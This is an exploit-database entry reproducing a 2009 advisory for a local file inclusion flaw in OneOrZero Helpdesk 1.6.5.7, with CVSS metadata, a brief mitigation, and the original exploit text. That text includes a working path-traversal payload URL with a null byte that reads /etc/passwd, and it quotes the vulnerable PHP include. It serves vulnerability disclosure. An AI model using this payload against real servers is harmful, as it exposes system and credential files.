header-logo
Suggest Exploit
vendor:
OneOrZero Helpdesk and Task Management System
by:
dun
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: OneOrZero Helpdesk and Task Management System
Affected Version From: 1.6.5.7
Affected Version To: 1.6.5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:oneorzero:oneorzero_helpdesk_and_task_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

OneOrZero Helpdesk and Task Management System is vulnerable to a Local File Inclusion vulnerability due to insufficient sanitization of user-supplied input. This vulnerability allows an attacker to include a file from the local system, which can lead to the disclosure of sensitive information. The vulnerable code is located in the './oozv1657/common/login.php' file, line 104.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #############################################################################
 #  [ OneOrZero Helpdesk <= 1.6.5.7 ]   Local File Inclusion Vulnerability   #
 #############################################################################
 # 
 # Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
 #          used by companies and groups large and small to manage information and requests in their organization. "
 #
 # Script site: http://www.oneorzero.com/
 # Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
 #
 # [LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd%00
 #      
 # Bug: ./oozv1657/common/login.php (line: 104)
 #
 # ...
 #	// require_once "../common/common.php";
 #	if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
 # 	   require_once "../lang/$default_language.lang.php";
 #	else
 # 	   require_once "lang/$default_language.lang.php";							// LFI (register_globals = On, magic_quotes_gpc = Off)
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2009 ] 

*******************************************************************************************

# milw0rm.com [2009-03-06]